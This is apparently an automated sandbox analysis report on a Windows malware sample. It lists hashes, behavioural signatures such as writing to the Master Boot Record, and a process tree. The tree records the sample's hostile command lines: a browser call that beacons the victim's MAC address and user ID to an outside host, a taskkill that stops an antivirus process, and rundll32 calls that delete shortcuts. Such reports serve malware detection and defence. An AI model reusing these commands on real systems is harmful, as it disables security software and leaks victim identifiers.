Analysis
-
max time kernel
175s -
max time network
196s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
28-11-2022 14:59
Static task
static1
Behavioral task
behavioral1
Sample
4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe
Resource
win10v2004-20221111-en
General
-
Target
4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe
-
Size
66KB
-
MD5
6a8a87bdde4c990495445537002b875d
-
SHA1
f042ff475685cfb50660876ecabe777638985758
-
SHA256
4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c
-
SHA512
4f786f1e224ad52b82c54117da36927726e863a5850364f34b2dce65540140a38eb0e182119c3d021de089da33321177f9f7ad72a7e988ae43d855ff00840410
-
SSDEEP
1536:A0AQ7vNqh8Ks9dFcQanJI3s0t2Jk6HuJAJr0eoKM:4Aqh8KWdVI2eu6O7T
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
hrdsoft.exepid process 1120 hrdsoft.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exedescription ioc process File opened for modification \??\PhysicalDrive0 4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe -
Drops file in System32 directory 11 IoCs
Processes:
hrdsoft.exe4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exedescription ioc process File opened for modification C:\Windows\SysWOW64\hrdsoft.exe hrdsoft.exe File opened for modification C:\Windows\SysWOW64\4.ico 4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe File opened for modification C:\Windows\SysWOW64\6.ico 4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe File opened for modification C:\Windows\SysWOW64\7.ico 4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe File opened for modification C:\Windows\SysWOW64\ba1023.ico 4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe File opened for modification C:\Windows\SysWOW64\9.ico 4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe File opened for modification C:\Windows\SysWOW64\10.ico 4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe File opened for modification C:\Windows\SysWOW64\2.ico 4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe File opened for modification C:\Windows\SysWOW64\3.ico 4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe File opened for modification C:\Windows\SysWOW64\5.ico 4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe File opened for modification C:\Windows\SysWOW64\8.ico 4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 896 taskkill.exe -
Processes:
iexplore.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exepid process 228 4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe 228 4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
taskkill.exehrdsoft.exedescription pid process Token: SeDebugPrivilege 896 taskkill.exe Token: SeRestorePrivilege 1120 hrdsoft.exe Token: SeBackupPrivilege 1120 hrdsoft.exe Token: SeRestorePrivilege 1120 hrdsoft.exe Token: SeBackupPrivilege 1120 hrdsoft.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exehrdsoft.exepid process 228 4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe 1120 hrdsoft.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exehrdsoft.exedescription pid process target process PID 228 wrote to memory of 4280 228 4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe iexplore.exe PID 228 wrote to memory of 4280 228 4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe iexplore.exe PID 228 wrote to memory of 1120 228 4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe hrdsoft.exe PID 228 wrote to memory of 1120 228 4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe hrdsoft.exe PID 228 wrote to memory of 1120 228 4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe hrdsoft.exe PID 1120 wrote to memory of 896 1120 hrdsoft.exe taskkill.exe PID 1120 wrote to memory of 896 1120 hrdsoft.exe taskkill.exe PID 1120 wrote to memory of 896 1120 hrdsoft.exe taskkill.exe PID 1120 wrote to memory of 3384 1120 hrdsoft.exe rundll32.exe PID 1120 wrote to memory of 3384 1120 hrdsoft.exe rundll32.exe PID 1120 wrote to memory of 3384 1120 hrdsoft.exe rundll32.exe PID 1120 wrote to memory of 452 1120 hrdsoft.exe rundll32.exe PID 1120 wrote to memory of 452 1120 hrdsoft.exe rundll32.exe PID 1120 wrote to memory of 452 1120 hrdsoft.exe rundll32.exe PID 1120 wrote to memory of 4472 1120 hrdsoft.exe rundll32.exe PID 1120 wrote to memory of 4472 1120 hrdsoft.exe rundll32.exe PID 1120 wrote to memory of 4472 1120 hrdsoft.exe rundll32.exe PID 1120 wrote to memory of 4120 1120 hrdsoft.exe rundll32.exe PID 1120 wrote to memory of 4120 1120 hrdsoft.exe rundll32.exe PID 1120 wrote to memory of 4120 1120 hrdsoft.exe rundll32.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe"C:\Users\Admin\AppData\Local\Temp\4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe"1⤵
- Writes to the Master Boot Record (MBR)
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.5913.net/a/get.asp?mac=FAE5CAF40400&makedate=QM00013&comput=Home&ver=81&userid=00012⤵
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\hrdsoft.exeC:\Windows\system32\hrdsoft.exe C:\Users\Admin\AppData\Local\Temp\4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe===2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ZhuDongFangyu.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe advpack.dll,DelNodeRunDLL32 c:\users\admin\appdata\roaming\microsoft\internet explorer\quick launch\google chrome.lnk3⤵
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe advpack.dll,DelNodeRunDLL32 c:\users\admin\appdata\roaming\microsoft\internet explorer\quick launch\microsoft edge.lnk3⤵
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe advpack.dll,DelNodeRunDLL32 c:\users\admin\appdata\roaming\microsoft\internet explorer\quick launch\shows desktop.lnk3⤵
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe advpack.dll,DelNodeRunDLL32 c:\users\admin\appdata\roaming\microsoft\internet explorer\quick launch\window switcher.lnk3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Windows\SysWOW64\hrdsoft.exeFilesize
21KB
MD5f43c6092eba273dae6b1adea10a8b6e1
SHA1e4cbdfa66d74d0a10793df4c45c50c98da702081
SHA256c50741ad9ef538177d76e7790aa2502870b51223324db72f183f73f414e349eb
SHA5121cf83eb17597d26ca003cc63e97e96e703dcd39be5954a5dc256d4c6601e71b7a13fa756277015b3e325c3d4f14df6667f9310c7fb4bfa759eae71d684ce3f45
-
C:\Windows\SysWOW64\hrdsoft.exeFilesize
21KB
MD5f43c6092eba273dae6b1adea10a8b6e1
SHA1e4cbdfa66d74d0a10793df4c45c50c98da702081
SHA256c50741ad9ef538177d76e7790aa2502870b51223324db72f183f73f414e349eb
SHA5121cf83eb17597d26ca003cc63e97e96e703dcd39be5954a5dc256d4c6601e71b7a13fa756277015b3e325c3d4f14df6667f9310c7fb4bfa759eae71d684ce3f45
-
memory/228-132-0x0000000000400000-0x0000000000423000-memory.dmpFilesize
140KB
-
memory/228-141-0x0000000000400000-0x0000000000423000-memory.dmpFilesize
140KB
-
memory/452-144-0x0000000000000000-mapping.dmp
-
memory/896-142-0x0000000000000000-mapping.dmp
-
memory/1120-135-0x0000000000000000-mapping.dmp
-
memory/1120-140-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/1120-147-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/3384-143-0x0000000000000000-mapping.dmp
-
memory/4120-146-0x0000000000000000-mapping.dmp
-
memory/4472-145-0x0000000000000000-mapping.dmp